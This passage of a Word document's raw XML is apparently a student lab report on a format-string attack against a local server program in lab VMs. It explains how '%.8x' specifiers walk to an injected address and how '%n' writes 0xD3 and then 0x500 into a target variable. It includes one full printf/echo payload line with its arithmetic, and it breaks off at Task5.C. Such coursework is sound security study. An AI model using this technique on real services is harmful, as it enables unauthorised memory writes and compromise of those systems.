    </w:p>
    <w:p w14:paraId="70D4AD23" w14:textId="1C63587E" w:rsidR="00981F38" w:rsidRDefault="00981F38">
      <w:r>
        <w:t xml:space="preserve">screenshot1, </w:t>
      </w:r>
      <w:r w:rsidR="00B16DAC">
        <w:t>we first run the serve</w:t>
      </w:r>
      <w:r w:rsidR="00436187">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00B16DAC">
        <w:t xml:space="preserve"> program on server VM, so we know the address of the target which is 0x0804a040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB75B71" w14:textId="77777777" w:rsidR="00B16DAC" w:rsidRDefault="00B16DAC"/>
    <w:p w14:paraId="7560684F" w14:textId="7979FFEC" w:rsidR="00B16DAC" w:rsidRDefault="00217884">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="595A1962" wp14:editId="21EF9CF6">
            <wp:extent cx="5924550" cy="778510"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="71" name="Picture 71" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.2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10-17%20at%209.29.4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778510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0096A1CB" w14:textId="0D5D1ED9" w:rsidR="00B16DAC" w:rsidRDefault="00B16DAC">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot2, we send a message to server from the attacker VM. This time our goal is to get the position of the add</w:t>
      </w:r>
      <w:r w:rsidR="00436187">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ress which we put in the message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6544F799" w14:textId="77777777" w:rsidR="00DB0AB1" w:rsidRDefault="00DB0AB1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21DB9A2D" w14:textId="7F3B99A7" w:rsidR="00DB0AB1" w:rsidRDefault="00FA7CE6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A670550" wp14:editId="7CE52EA6">
            <wp:extent cx="5924550" cy="1110615"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="83" name="Picture 83" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.5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8-10-17%20at%209.53.38%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4550" cy="1110615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920CF66" w14:textId="08B5A93E" w:rsidR="00DB0AB1" w:rsidRDefault="00DB0AB1">
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshot3, </w:t>
      </w:r>
      <w:r w:rsidR="002E71C7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>the target address is written in the buf[] (</w:t>
      </w:r>
      <w:r w:rsidR="002E71C7">
        <w:t>in the 24</w:t>
      </w:r>
      <w:r w:rsidR="002E71C7" w:rsidRPr="00476FE1">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="002E71C7">
        <w:t xml:space="preserve"> position as we expected</w:t>
      </w:r>
      <w:r w:rsidR="002E71C7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F9C314" w14:textId="77777777" w:rsidR="00217884" w:rsidRDefault="00217884">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC16E9E" w14:textId="45B2282C" w:rsidR="00DB0AB1" w:rsidRDefault="00BE231D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46C6F836" wp14:editId="3C9F48A1">
            <wp:extent cx="5924550" cy="567055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="84" name="Picture 84" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.5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8-10-17%20at%209.56.3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550" cy="567055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B8B5A3" w14:textId="61A21A33" w:rsidR="00C261D1" w:rsidRDefault="00C261D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot4, we use specifier “%n” to write on the target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A58898F" w14:textId="77777777" w:rsidR="00C261D1" w:rsidRDefault="00C261D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D3FBE8" w14:textId="4C81680D" w:rsidR="00C261D1" w:rsidRDefault="00BE231D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CC18F36" wp14:editId="674B3D74">
            <wp:extent cx="5924550" cy="1012825"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="85" name="Picture 85" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.5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8-10-17%20at%209.57.00%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1012825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="516DB1CD" w14:textId="435FD683" w:rsidR="00C261D1" w:rsidRDefault="00C261D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot5, we successfully modify the value of the target variable</w:t>
      </w:r>
      <w:r w:rsidR="00FF5BA7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="006D01AF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00FF5BA7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D01AF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0xd3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469B29D2" w14:textId="77777777" w:rsidR="00A14D2C" w:rsidRDefault="00A14D2C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379E83E0" w14:textId="77777777" w:rsidR="001E1762" w:rsidRDefault="001E1762">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2A542A" w14:textId="77777777" w:rsidR="002E71C7" w:rsidRDefault="002E71C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A03C5F" w14:textId="5B332721" w:rsidR="00A14D2C" w:rsidRPr="00A14D2C" w:rsidRDefault="00A14D2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A14D2C">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54710570" w14:textId="52777A74" w:rsidR="00A14D2C" w:rsidRDefault="00A14D2C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>In this task, we want to modify the value</w:t>
      </w:r>
      <w:r w:rsidR="00436187">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> in target address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">The most steps are same as task4.b. We first run the server program, and it will </w:t>
      </w:r>
      <w:r w:rsidR="00436187">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> the target variable address</w:t>
      </w:r>
      <w:r w:rsidR="001D166B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (screenshot1)</w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. Then we put the target variable address in the </w:t>
      </w:r>
      <w:r w:rsidR="00436187">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>buf[]</w:t>
      </w:r>
      <w:r w:rsidR="001D166B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (screenshot2)</w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00436187">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> We check the buf[] position again</w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00436187">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not change, it is still </w:t>
      </w:r>
      <w:r w:rsidR="00766C16">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>the 24</w:t>
      </w:r>
      <w:r w:rsidR="00302059" w:rsidRPr="00302059">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00766C16">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“%.8x”</w:t>
      </w:r>
      <w:r w:rsidR="00436187">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (screenshot3)</w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. Now we can write to the target address, </w:t>
      </w:r>
      <w:r w:rsidR="00436187">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">we first use 24 “%.8x” to move the var_list pointer to the target </w:t>
      </w:r>
      <w:r w:rsidR="002E71C7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">address </w:t>
      </w:r>
      <w:r w:rsidR="00436187">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">in the buf[]; then </w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>we use “%n” specifier</w:t>
      </w:r>
      <w:r w:rsidR="00436187">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to write on the target address</w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, this specifier writes the number of character</w:t>
      </w:r>
      <w:r w:rsidR="002E71C7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s printed out so far into memory. In our case, we already print out 4 (address) + 23 * 8(23 “%.8x”) + 23 (“.”) = 2</w:t>
      </w:r>
      <w:r w:rsidR="003C7CC0">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00842054">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="002E71C7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0xD3.</w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> As screenshot4 and 5 show, we successfully modified the value of the target variable</w:t>
      </w:r>
      <w:r w:rsidR="002E71C7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to 0xD3</w:t>
      </w:r>
      <w:r w:rsidR="00302059">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F05A7B" w14:textId="77777777" w:rsidR="00FC611B" w:rsidRDefault="00FC611B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CBD2E3" w14:textId="0A6A5DED" w:rsidR="00FC611B" w:rsidRPr="00FC611B" w:rsidRDefault="00FC611B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC611B">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task5.B: Change the value to 0x500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A661CC5" w14:textId="77777777" w:rsidR="00FC611B" w:rsidRDefault="00FC611B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA214F5" w14:textId="298F34D1" w:rsidR="00FC611B" w:rsidRDefault="00FA7CE6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F76D90D" wp14:editId="369C33A4">
            <wp:extent cx="5932170" cy="604520"/>
            <wp:effectExtent l="0" t="0" r="11430" b="5080"/>
            <wp:docPr id="79" name="Picture 79" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.5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8-10-17%20at%209.51.37%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170" cy="604520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC6BE30" w14:textId="44B5D3B4" w:rsidR="00073E96" w:rsidRDefault="00073E96">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshot1, we change the input message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E294C4B" w14:textId="77777777" w:rsidR="004A69BE" w:rsidRDefault="004A69BE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1783907E" w14:textId="405CE1B0" w:rsidR="004A69BE" w:rsidRDefault="00FA7CE6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ECCDFC2" wp14:editId="65C01C58">
            <wp:extent cx="5924550" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="80" name="Picture 80" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.5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8-10-17%20at%209.51.5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1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DE8506" w14:textId="1EC29436" w:rsidR="004A69BE" w:rsidRDefault="004A69BE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot2, we successfully change target variable to 0x500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C8CD86" w14:textId="77777777" w:rsidR="004A69BE" w:rsidRDefault="004A69BE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696F484F" w14:textId="227DB9A5" w:rsidR="004A69BE" w:rsidRPr="004A69BE" w:rsidRDefault="004A69BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A69BE">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D023DDD" w14:textId="40CA373A" w:rsidR="00C84416" w:rsidRDefault="004A69BE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">In this task, we want to change the target variable to 0x500. The most steps are same as last task, the only different is the written value. In last task, we can just put a number in there. But here we need to put 0x500. </w:t>
      </w:r>
      <w:r w:rsidR="00C84416">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>So we modified the input message</w:t>
      </w:r>
      <w:r w:rsidR="001D166B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF53D4" w14:textId="4C9F7B0D" w:rsidR="00C84416" w:rsidRPr="00C84416" w:rsidRDefault="00C84416">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C84416">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>echo $(printf "\x40\xa0\x04\x08")%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.1077x</w:t>
      </w:r>
      <w:r w:rsidR="003731E3">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84416">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%n &gt; input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C87A39B" w14:textId="0944E3C4" w:rsidR="0009496B" w:rsidRDefault="003731E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>There are three parts: first, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84416">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>printf "\x40\xa0\x04\x08"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">”, we use it to write </w:t>
      </w:r>
      <w:r w:rsidR="009C60EF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">the target address on the </w:t>
      </w:r>
      <w:r w:rsidR="00497741">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>buf[]</w:t>
      </w:r>
      <w:r w:rsidR="009C60EF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>econd, “</w:t>
      </w:r>
      <w:r w:rsidRPr="003731E3">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%.8x……%.8x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">”, this is used to move the pointer of var_list to the target address in the </w:t>
      </w:r>
      <w:r w:rsidR="00497741">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>buf[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C144B4">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> so we can write to this address,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and its position is in the the 24</w:t>
      </w:r>
      <w:r w:rsidRPr="003731E3">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> “%.8x”. “</w:t>
      </w:r>
      <w:r w:rsidRPr="003731E3">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%.1077x%n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”, this is the last part, because this time we want</w:t>
      </w:r>
      <w:r w:rsidR="001D166B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to writ 0x500 which is 1280</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> in decimal, so we need to increate value of the character counter. Therefore, we need to print more characters; in this case, </w:t>
      </w:r>
      <w:r w:rsidR="001D166B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>we already print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 (the address part), 22*8 = 176 (22 “%.8x”), 23 (23 “.”). So the total is 203. </w:t>
      </w:r>
      <w:r w:rsidR="00560371">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">By a simple subtraction 1280 – 203 = 1077, so we need to print 1077 </w:t>
      </w:r>
      <w:r w:rsidR="00560371">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">characters more. “%.1077x” did that. Afterwards, we can write on the </w:t>
      </w:r>
      <w:r w:rsidR="003B022C">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r w:rsidR="00560371">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>address by specifier “%n”. As screenshot2 shows, we are successfully modified target variable</w:t>
      </w:r>
      <w:r w:rsidR="003B022C">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> value</w:t>
      </w:r>
      <w:r w:rsidR="00560371">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to 0x500.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F037111" w14:textId="77777777" w:rsidR="003731E3" w:rsidRDefault="003731E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF33E67" w14:textId="77777777" w:rsidR="00936FC2" w:rsidRDefault="00936FC2">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0459BDDD" w14:textId="29BCAA4B" w:rsidR="000E044C" w:rsidRPr="002265F9" w:rsidRDefault="001543CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0009496B">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Task5.C: </w:t>
      </w:r>
      <w:r w:rsidR="00611C8F" w:rsidRPr="0009496B">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
